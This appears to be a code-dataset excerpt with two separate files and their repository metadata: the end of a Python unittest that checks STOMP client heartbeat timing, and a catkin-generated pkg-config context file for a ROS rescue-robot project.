serverHeartBeatInSeconds = client.serverHeartBeat / 1000.0
clientHeartBeatInSeconds = client.clientHeartBeat / 1000.0
start = time.time()
while (time.time() - start) < (2.5 * max(serverHeartBeatInSeconds, clientHeartBeatInSeconds)):
time.sleep(0.5 * min(serverHeartBeatInSeconds, clientHeartBeatInSeconds))
client.canRead(0)
self.assertTrue((time.time() - client.lastReceived) < (1.5 * serverHeartBeatInSeconds))
if (time.time() - client.lastSent) > (0.5 * clientHeartBeatInSeconds):
client.beat()
self.assertTrue((time.time() - client.lastSent) < 0.1)
start = time.time()
try:
while not client.canRead(0.5 * clientHeartBeatInSeconds):
pass
except StompConnectionError:
self.assertTrue((time.time() - start) < (3.0 * clientHeartBeatInSeconds))
self.assertTrue((time.time() - client.lastReceived) < (1.5 * serverHeartBeatInSeconds))
self.assertTrue((time.time() - client.lastSent) > clientHeartBeatInSeconds)
else:
raise
client.close()
if __name__ == '__main__':
unittest.main()
| [
"akin.avci@irdeto.com"
] | akin.avci@irdeto.com |
3acebda40c7b000afc5ea51c29259bc92d74a4ff | a8a8bafeb2b8a7d302f48411a2777806f94010cc | /build/project/catkin_generated/pkg.develspace.context.pc.py | ed2a92a1b54338291e7545b40c4c75b250348bfc | [] | no_license | castillejoale/rescueRobots | 2498ea4454f275083d4d28b40c6f90c858939416 | b231b0e4510d4331c1288ce1bb093de4684b71cb | refs/heads/master | 2021-01-10T13:31:16.013380 | 2015-12-14T00:42:50 | 2015-12-14T00:42:50 | 47,943,552 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 391 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "project"
PROJECT_SPACE_DIR = "/home/cc/ee106a/fa15/class/ee106a-bv/project/devel"
PROJECT_VERSION = "0.0.0"
| [
"ee106a-bv@m92p-8"
] | ee106a-bv@m92p-8 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.